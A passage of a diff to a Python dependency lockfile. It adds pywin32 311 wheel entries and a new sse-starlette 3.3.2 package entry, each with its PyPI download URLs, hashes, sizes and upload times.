+    { url = "https://files.pythonhosted.org/packages/04/bf/90339ac0f55726dce7d794e6d79a18a91265bdf3aa70b6b9ca52f35e022a/pywin32-311-cp313-cp313-win_arm64.whl", hash = "sha256:7b4075d959648406202d92a2310cb990fea19b535c7f4a78d3f5e10b926eeb8a", size = 8709318, upload-time = "2025-07-14T20:13:30.348Z" },
+    { url = "https://files.pythonhosted.org/packages/c9/31/097f2e132c4f16d99a22bfb777e0fd88bd8e1c634304e102f313af69ace5/pywin32-311-cp314-cp314-win32.whl", hash = "sha256:b7a2c10b93f8986666d0c803ee19b5990885872a7de910fc460f9b0c2fbf92ee", size = 8840714, upload-time = "2025-07-14T20:13:32.449Z" },
+    { url = "https://files.pythonhosted.org/packages/90/4b/07c77d8ba0e01349358082713400435347df8426208171ce297da32c313d/pywin32-311-cp314-cp314-win_amd64.whl", hash = "sha256:3aca44c046bd2ed8c90de9cb8427f581c479e594e99b5c0bb19b29c10fd6cb87", size = 9656800, upload-time = "2025-07-14T20:13:34.312Z" },
+    { url = "https://files.pythonhosted.org/packages/c0/d2/21af5c535501a7233e734b8af901574572da66fcc254cb35d0609c9080dd/pywin32-311-cp314-cp314-win_arm64.whl", hash = "sha256:a508e2d9025764a8270f93111a970e1d0fbfc33f4153b388bb649b7eec4f9b42", size = 8932540, upload-time = "2025-07-14T20:13:36.379Z" },
+]
+
 [[package]]
 name = "pyyaml"
 version = "6.0.3"
@@ -2639,6 +2711,19 @@ wheels = [
    { url = "https://files.pythonhosted.org/packages/e9/44/75a9c9421471a6c4805dbf2356f7c181a29c1879239abab1ea2cc8f38b40/sniffio-1.3.1-py3-none-any.whl", hash = "sha256:2f6da418d1f1e0fddd844478f41680e794e6051915791a034ff65e5f100525a2", size = 10235, upload-time = "2024-02-25T23:20:01.196Z" },
 ]

+[[package]]
+name = "sse-starlette"
+version = "3.3.2"
+source = { registry = "https://pypi.org/simple" }
+dependencies = [
+    { name = "anyio" },
+    { name = "starlette" },
+]
+sdist = { url = "https://files.pythonhosted.org/packages/5a/9f/c3695c2d2d4ef70072c3a06992850498b01c6bc9be531950813716b426fa/sse_starlette-3.3.2.tar.gz", hash = "sha256:678fca55a1945c734d8472a6cad186a55ab02840b4f6786f5ee8770970579dcd", size = 32326, upload-time = "2026-02-28T11:24:34.36Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/61/28/8cb142d3fe80c4a2d8af54ca0b003f47ce0ba920974e7990fa6e016402d1/sse_starlette-3.3.2-py3-none-any.whl", hash = "sha256:5c3ea3dad425c601236726af2f27689b74494643f57017cafcb6f8c9acfbb862", size = 14270, upload-time = "2026-02-28T11:24:32.984Z" },
+]
+
 [[package]]
 name = "starlette"
 version = "0.52.1"